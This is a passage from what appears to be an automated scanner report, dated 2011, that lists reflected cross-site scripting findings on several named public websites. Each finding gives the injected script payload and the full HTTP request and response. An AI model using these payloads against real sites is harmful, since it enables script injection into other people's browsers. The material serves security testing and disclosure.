Cookie: PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000; __utmz=109405658.1304488444.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-115106725-1304488446007; __utma=109405658.384971914.1304488444.1304488444.1304488444.1; __utmc=109405658; __utmb=109405658.3.10.1304488444

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:56:38 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.8
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2Fcontact%2Fview%3Ftag%3Daccount%26limit%3D5%26title%3DMembers%2BArea%2Band%2BPasswords; expires=Wed, 04-May-2011 03:56:37 GMT; path=/; domain=www.quantumjumping.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 95761

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
               <script type="te
...[SNIP]...
<input type="hidden" name="atag" value="/customers534e3"><script>alert(1)</script>cc90e15a4bf/support/article?id=1343" />
...[SNIP]...

6.77. http://www.quantumjumping.com/customers/support/article [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /customers/support/article

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67737"><script>alert(1)</script>0bd5c80bbcd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /customers/support67737"><script>alert(1)</script>0bd5c80bbcd/article?id=1343 HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/contact/view?tag=account&limit=5&title=Members+Area+and+Passwords
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000; __utmz=109405658.1304488444.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-115106725-1304488446007; __utma=109405658.384971914.1304488444.1304488444.1304488444.1; __utmc=109405658; __utmb=109405658.3.10.1304488444

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:57:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2Fcontact%2Fview%3Ftag%3Daccount%26limit%3D5%26title%3DMembers%2BArea%2Band%2BPasswords; expires=Wed, 04-May-2011 03:57:11 GMT; path=/; domain=www.quantumjumping.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 95761

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
               <script type="te
...[SNIP]...
<input type="hidden" name="atag" value="/customers/support67737"><script>alert(1)</script>0bd5c80bbcd/article?id=1343" />
...[SNIP]...

6.78. http://www.quantumjumping.com/customers/support/article [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /customers/support/article

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1bef"><script>alert(1)</script>39db3655b7e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /customers/support/articlee1bef"><script>alert(1)</script>39db3655b7e?id=1343 HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/contact/view?tag=account&limit=5&title=Members+Area+and+Passwords
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000; __utmz=109405658.1304488444.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-115106725-1304488446007; __utma=109405658.384971914.1304488444.1304488444.1304488444.1; __utmc=109405658; __utmb=109405658.3.10.1304488444

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:57:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2Fcontact%2Fview%3Ftag%3Daccount%26limit%3D5%26title%3DMembers%2BArea%2Band%2BPasswords; expires=Wed, 04-May-2011 03:57:47 GMT; path=/; domain=www.quantumjumping.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 95775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
               <script type="te
...[SNIP]...
<input type="hidden" name="atag" value="/customers/support/articlee1bef"><script>alert(1)</script>39db3655b7e?id=1343" />
...[SNIP]...

6.79. http://www.quantumjumping.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a34c4"><script>alert(1)</script>42602835c1e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoa34c4"><script>alert(1)</script>42602835c1e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.quantumjumping.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:42:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: PHPSESSID=ta0onjdvur4f6tbul61gpqio05; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 95685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
               <script type="te
...[SNIP]...
<input type="hidden" name="atag" value="/favicon.icoa34c4"><script>alert(1)</script>42602835c1e" />
...[SNIP]...

6.80. http://www.quantumjumping.com/media/themes/images/a/call.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /media/themes/images/a/call.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8986"><script>alert(1)</script>7ed0089077c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediae8986"><script>alert(1)</script>7ed0089077c/themes/images/a/call.png HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.3.10.1304487910

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:56:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2F; expires=Wed, 04-May-2011 03:56:01 GMT; path=/; domain=www.quantumjumping.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 95788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
               <script type="te
...[SNIP]...
<input type="hidden" name="atag" value="/mediae8986"><script>alert(1)</script>7ed0089077c/themes/images/a/call.png" />
...[SNIP]...

6.81. http://www.quantumjumping.com/media/themes/images/a/call.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /media/themes/images/a/call.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 927df"><script>alert(1)</script>db7370f1191 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/themes927df"><script>alert(1)</script>db7370f1191/images/a/call.png HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.3.10.1304487910

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:56:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2F; expires=Wed, 04-May-2011 03:56:22 GMT; path=/; domain=www.quantumjumping.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 95789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
               <script type="te
...[SNIP]...
<input type="hidden" name="atag" value="/media/themes927df"><script>alert(1)</script>db7370f1191/images/a/call.png" />
...[SNIP]...

6.82. http://www.quantumjumping.com/media/themes/images/a/call.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /media/themes/images/a/call.png

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 983cd"><script>alert(1)</script>b351945b4cb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/themes/images983cd"><script>alert(1)</script>b351945b4cb/a/call.png HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.3.10.1304487910

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:56:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2F; expires=Wed, 04-May-2011 03:56:48 GMT; path=/; domain=www.quantumjumping.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 95789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
               <script type="te
...[SNIP]...
<input type="hidden" name="atag" value="/media/themes/images983cd"><script>alert(1)</script>b351945b4cb/a/call.png" />
...[SNIP]...

6.83. http://www.quantumjumping.com/media/themes/images/a/call.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /media/themes/images/a/call.png

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89853"><script>alert(1)</script>f94a3e06c7e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/themes/images/a89853"><script>alert(1)</script>f94a3e06c7e/call.png HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.3.10.1304487910

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:57:12 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.8
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2F; expires=Wed, 04-May-2011 03:57:11 GMT; path=/; domain=www.quantumjumping.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 95774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
               <script type="te
...[SNIP]...
<input type="hidden" name="atag" value="/media/themes/images/a89853"><script>alert(1)</script>f94a3e06c7e/call.png" />
...[SNIP]...

6.84. http://www.quantumjumping.com/media/themes/images/a/call.png [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /media/themes/images/a/call.png

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1319a"><script>alert(1)</script>a1b0bda2cd6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/themes/images/a/call.png1319a"><script>alert(1)</script>a1b0bda2cd6 HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.3.10.1304487910

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:57:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2F; expires=Wed, 04-May-2011 03:57:35 GMT; path=/; domain=www.quantumjumping.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 95774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
               <script type="te
...[SNIP]...
<input type="hidden" name="atag" value="/media/themes/images/a/call.png1319a"><script>alert(1)</script>a1b0bda2cd6" />
...[SNIP]...

6.85. http://www.quantumjumping.com/media/themes/images/a/call.png [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /media/themes/images/a/call.png

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8d05"><script>alert(1)</script>5c30f734075 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/themes/images/a/call.png?d8d05"><script>alert(1)</script>5c30f734075=1 HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.3.10.1304487910

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:54:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.8
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2F; expires=Wed, 04-May-2011 03:54:50 GMT; path=/; domain=www.quantumjumping.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 95649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
               <script type="te
...[SNIP]...
<input type="hidden" name="atag" value="/media/themes/images/a/call.png?d8d05"><script>alert(1)</script>5c30f734075=1" />
...[SNIP]...

6.86. http://www.quantumjumping.com/products [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /products

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9f40"><script>alert(1)</script>6af7e86c800 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /productsa9f40"><script>alert(1)</script>6af7e86c800 HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.4.10.1304487910

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:56:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 95670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
               <script type="te
...[SNIP]...
<input type="hidden" name="atag" value="/productsa9f40"><script>alert(1)</script>6af7e86c800" />
...[SNIP]...

6.87. http://www.quantumjumping.com/products [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /products

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87cc4"><script>alert(1)</script>a4da606a7e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products?87cc4"><script>alert(1)</script>a4da606a7e0=1 HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.4.10.1304487910

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:54:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 111829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" >
<head>
       <script>
f
...[SNIP]...
<input type="hidden" name="atag" value="/products?87cc4"><script>alert(1)</script>a4da606a7e0=1" />
...[SNIP]...

6.88. http://www.rapidmaniac.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rapidmaniac.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 93f70'style%3d'x%3aexpression(alert(1))'615d99451f0 was submitted in the REST URL parameter 1. This input was echoed as 93f70'style='x:expression(alert(1))'615d99451f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /favicon.ico93f70'style%3d'x%3aexpression(alert(1))'615d99451f0 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rapidmaniac.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Wed, 04 May 2011 01:11:13 GMT
Content-Type: text/html; charset=utf8
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: PHPSESSID=3450e48a4688bc5d2e6a6ccaba296d93; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 8513

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
...[SNIP]...
<script type='text/javascript' src='/actions/event_tracker.php?referer=&page=/favicon.ico93f70'style='x:expression(alert(1))'615d99451f0&enter=1'>
...[SNIP]...

6.89. http://www.reflector.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reflector.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4697"><script>alert(1)</script>1d296c9f2d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoa4697"><script>alert(1)</script>1d296c9f2d2 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.reflector.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 May 2011 03:29:11 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=60
Vary: Accept-Encoding
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.9
Set-Cookie: SESS391af22a12335d38985f8e98d0435ca9=7935e01a0a8c0a4b7b880f1c344351a4; expires=Fri, 27-May-2011 06:59:51 GMT; path=/; domain=.reflector.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 04 May 2011 03:26:31 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Length: 20783

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...
<A href="/user/login?destination=favicon.icoa4697"><script>alert(1)</script>1d296c9f2d2">
...[SNIP]...

6.90. http://www.royal.gov.uk/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.royal.gov.uk
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 59d00-->a98bd1eb681 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

